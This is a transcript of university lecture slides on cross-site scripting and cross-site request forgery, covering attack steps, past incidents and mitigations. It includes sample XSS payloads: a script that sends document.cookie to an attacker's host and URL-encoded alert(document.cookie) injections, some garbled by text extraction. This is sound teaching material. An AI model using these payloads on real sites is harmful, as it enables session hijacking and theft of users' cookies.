Cross-Site Attacks James Walden Northern Kentucky University.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Nick Feamster CS 6262 Spring 2009
Cross Site Scripting (XSS)
Cross-site Request Forgery (CSRF) Attacks
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
EECS 354 Network Security Cross Site Scripting (XSS)
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
HTTP and Server Security James Walden Northern Kentucky University.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Prevent Cross-Site Scripting (XSS) attack
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Penetration Testing James Walden Northern Kentucky University.
© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Web 2.0 Security James Walden Northern Kentucky University.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Web Applications Testing By Jamie Rougvie Supported by.
Cross Site Scripting and its Issues By Odion Oisamoje.
1 Robust Defenses for Cross-Site Request Forgery Adam Barth, Collin Jackson, John C. Mitchell Stanford University 15th ACM CCS.
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.
Session Management Tyler Moore CS7403 University of Tulsa Slides adapted in part or whole from Dan Boneh, Stanford CS155 1.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
XSS 101 Jason Clark 12/20.
CSC 482/582: Computer Security
Javascript worms By Benjamin Mossé SecPro
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Building Secure ColdFusion Applications
CSCE 548 Student Presentation Ryan Labrador
Cross-Site Scripting Travis Deyarmin.
API Security Auditing Be Aware,Be Safe
Ofer Shezaf, CTO, Breach Security
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Cross-Site Request Forgeries: Exploitation and Prevention
CSC 482/582: Computer Security
Riding Someone Else’s Wave with CSRF
CSC 495/583 Topics of Software Security Intro to Web Security
CSC 482/582: Computer Security
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Cross-Site Scripting Attack (XSS)
Cross Site Request Forgery (CSRF)
Presentation transcript:

Cross-Site Attacks James Walden Northern Kentucky University

CSC 666: Secure Software Engineering Cross-Site Attacks Target users of application.  Use application feature to reach other users of application.  Clients are less well defended than servers.  Obtain assets of individual users rather than assets of entire application. Most common type of attack.  Cross-Site Scripting (XSS)  Cross-Site Request Forgery (CSRF)

CSC 666: Secure Software Engineering Cross-Site Scripting (XSS)  Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing.  Impact of XSS  Account hijacking.  Browser hijacking (malware hosting.)  Information leakage (stored form values, etc.)  Virtual defacement.

CSC 666: Secure Software Engineering XSS Examples MySpace worm (October 2005)  When someone viewed Samy’s profile: -Set him as friend of viewer. -Incorporated code in viewer’s profile. Paypal (2006)  XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006)  By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.

CSC 666: Secure Software Engineering XSS Key Steps 1.Attacker sends code to web application. 2.Legitimate user accesses web app. 3.Web app sends attacker code to user. 4.User’s browser executes code.

CSC 666: Secure Software Engineering XSS Example Client browser sends an error message to the web server. Sorry%2C+an +error+occurred

CSC 666: Secure Software Engineering XSS Example The error message is “Reflected” back from the Web server to the client in a web page.

CSC 666: Secure Software Engineering XSS Example We can replace the error with JavaScript alert(‘xss’);

CSC 666: Secure Software Engineering Exploiting the Example 1.User logins in and is issued a cookie 2.Attacker feed the URL to user var+i=new+Image;+i.src=“ cker.com/”%2bdocument.cookie;

CSC 666: Secure Software Engineering Why does XSS Work? Same-Origin Policy  Browser only allows Javascript from site X to access cookies and other data from site X.  Attacker needs to make attack come from site X. Vulnerable Server Program  Any program that returns user input without filtering out dangerous code.

CSC 666: Secure Software Engineering Reflected XSS  Attack Scenario  User clicks on link.  Injected script returned by one-time message from vulnerable site.  User browser executes injected code.  Limitations  Non-persistent. Only works when user clicks.  Most common type of XSS (~75%).

CSC 666: Secure Software Engineering Anatomy of an XSS Attack 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil site saves ID. 8. Attacker hijacks user session. 6. Page with injected code.

CSC 666: Secure Software Engineering XSS URL Examples ttp:// "> alert(document.cookie) ge2.html?tw= alert(‘Test’); alert( document.cookie) &frompage=4&page=1&ct=VVT V&mh=0&sh=0&RN=1 h_exe?search_text=_%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C%2Fscript%3E

CSC 666: Secure Software Engineering Stored XSS  Injected script stored in  Post or comment.  Review.  Uploaded file.  User views page with injected script.  Malicious action is taken while user is logged into site where malware found.  Not technically cross-site.  Attack persists until injected code deleted.

CSC 666: Secure Software Engineering DOM-based XSS Attack scenario  User clicks on URL with crafted Javascript.  Application’s client code extracts data from URL and dynamically updates page with it.  User browser executes crafted Javascript that was inserted in the page. Exploits vulnerability in client code.  Server does not reflect or store evil Javascript.

CSC 666: Secure Software Engineering Mitigating XSS 1.Disallow HTML input 2.Allow only safe HTML tags 3.Filter output Replace HTML special characters in output ex: replace with > also replace (, ), #, & 4.Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for.

CSC 666: Secure Software Engineering Cross-Site Request Forgery A confused deputy attack.  Exploits trust that application has with authentication sessions. Attack scenario:  User authenticates to web application.  User browses to another site containing a malicious CSRF attack link to web app. -iframe, img, link, bgsound, etc.  Browser accesses web app with cached credentials, performing whatever action specified by the link.

CSC 666: Secure Software Engineering Why is the Application Fooled?  Browser sends same GET request if  User submits form.  Browser fetches iframe or img src, etc.  Browser sends cookies with any GET request to appropriate domain + path.  Same origin policy applies to frames, XHRs, but not to HTML tags.

CSC 666: Secure Software Engineering Example: DSL Modem Attack  Home network devs administered via web apps.  Standard local IPs.  Attacker inserts 1-pixel img tag on page.  src is URL of form submission, giving remote admin.  No password needed.  Software owner assumed device on trusted local network.  Of course, browser is on the local network too.

CSC 666: Secure Software Engineering Mitigating CSRF Require POST for data modifications, but  Many frameworks automatically fetch both types of parameters or convert one to other.  Hidden POST requests can be created with scripts. Check referer header.  But users can block or forge referer header, so it cannot be relied on for everyone. Use nonces.  Random token inserted as hidden parameter, and thus submitted with form.  But XSS can read form, so a combined XSS + CSRF attack can bypass this defense.

CSC 666: Secure Software Engineering Mitigating CSRF Re-authenticate for high value transactions.  Use out of band authentication if possible. Expire session IDs quickly.  But there will always be some time period in which a CSRF attack will work. Automate defenses with tools.  CSRFGuard to insert nonces.  CSRFTester to verify application.

CSC 666: Secure Software Engineering References 1.Brian Chess and Jacob West, Secure Programming with Static Analysis, Addison-Wesley, Seth Fogie et. al., XSS Attacks: Cross-Site Scripting Exploits and Defense, Syngress, Michael Howard, David LeBlanc, and John Viega, 19 Deadly Sins of Software Security, McGraw-Hill Osborne, Nathan, vulns-on-local-network-devices/, vulns-on-local-network-devices/ 5.PCI Security Standards Council, PCI DSS Requirements and Security Assessment Procedures, v1.2, Dafydd Stuttart and Marcus Pinto, The Web Application Hacker’s Handbook, Wiley, 2008.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.